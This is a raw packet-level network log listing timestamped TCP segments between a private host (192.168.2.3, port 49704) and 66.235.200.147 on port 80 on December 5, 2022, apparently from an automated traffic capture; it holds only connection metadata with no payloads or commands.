Dec 5, 2022 01:32:31.491472960 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.491477966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491508007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491533041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.491534948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491564035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491590023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491592884 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.491616964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491637945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.492296934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492326021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492353916 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492358923 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.492383957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492402077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.492413044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492440939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492460966 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.492469072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492497921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492521048 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.492525101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492556095 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.492573023 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.493268967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493297100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493321896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493331909 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.493347883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493367910 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.493375063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493402004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493422031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.493428946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493454933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493479013 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.493479967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493508101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.493527889 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.494232893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494260073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494285107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494292021 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.494311094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494330883 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.494338989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494364977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494385004 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.494391918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494417906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494441032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.494445086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494472980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.494493008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.495188951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495218039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495244980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495251894 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.495271921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495297909 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.495299101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495328903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495349884 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.495354891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495383024 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495403051 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.495410919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495440006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.495459080 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.496169090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496196032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496221066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496232033 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.496246099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496272087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496273041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.496299028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496316910 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.496325970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496351957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496372938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.496380091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496407986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.496426105 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502115965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502151012 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502182007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502191067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502213001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502233028 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502244949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502275944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502294064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502306938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502336979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502355099 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502376080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502432108 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502512932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502543926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502574921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502598047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502605915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502635956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502667904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502670050 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502698898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502718925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502729893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502772093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502805948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.502814054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.502862930 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.503484011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503514051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503545046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503567934 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.503573895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503603935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503628969 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.503632069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503660917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503685951 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.503690004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503720045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503743887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.503747940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.503802061 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.504437923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504467964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504496098 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504518032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.504523039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504555941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504575014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.504584074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504611969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504640102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504645109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.504668951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504690886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.504698992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.504748106 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.505382061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505412102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505440950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505464077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.505470991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505501032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505525112 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.505531073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505561113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505585909 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.505589962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505620003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505641937 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.505649090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.505701065 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.506366014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506395102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506423950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506448030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.506452084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506481886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506500959 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.506511927 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506544113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506562948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.506571054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506602049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506629944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.506630898 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.506680012 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.507338047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507368088 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507396936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507421017 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.507424116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507453918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507477045 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.507482052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507514000 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507530928 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.507543087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507571936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507596016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.507601023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.507648945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.508310080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508337975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508367062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508388996 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.508397102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508424997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508444071 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.508454084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508502007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508519888 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.508534908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508564949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508584976 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.508594990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.508652925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.509279966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509310961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509342909 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509367943 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.509376049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509407997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509424925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.509438038 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509469986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509489059 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.509500980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509533882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509550095 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.509562969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.509620905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513348103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513379097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513407946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513433933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513434887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513467073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513484001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513494968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513524055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513545036 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513552904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513581991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513605118 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513609886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513660908 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513830900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513860941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513890028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513916016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513917923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513947010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.513972044 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.513973951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514004946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514022112 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.514034033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514061928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514086008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.514090061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514137030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.514791965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514822006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514849901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514874935 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.514889956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514919043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514945030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.514949083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.514992952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515010118 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515039921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515072107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515094995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515103102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515156984 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515772104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515803099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515834093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515860081 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515866041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515898943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515918016 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515929937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515960932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.515980005 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.515991926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516022921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516040087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.516052961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516112089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.516752958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516781092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516809940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516829967 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.516838074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516865969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516895056 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516899109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.516922951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516943932 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.516953945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.516982079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517000914 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517013073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517060041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517699003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517729998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517760038 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517780066 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517788887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517817974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517842054 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517847061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517875910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517895937 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517904997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517934084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.517952919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.517963886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518012047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.518682003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518709898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518738031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518762112 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.518767118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518796921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518821001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.518826008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518857956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518881083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.518901110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518929958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.518953085 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.518961906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519007921 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.519639015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519669056 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519695044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519722939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519728899 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.519753933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519773006 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.519783020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519812107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519835949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.519840956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519870043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519890070 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.519900084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.519947052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.520620108 CET	80	49704	66.235.200.147	192.168.2.3
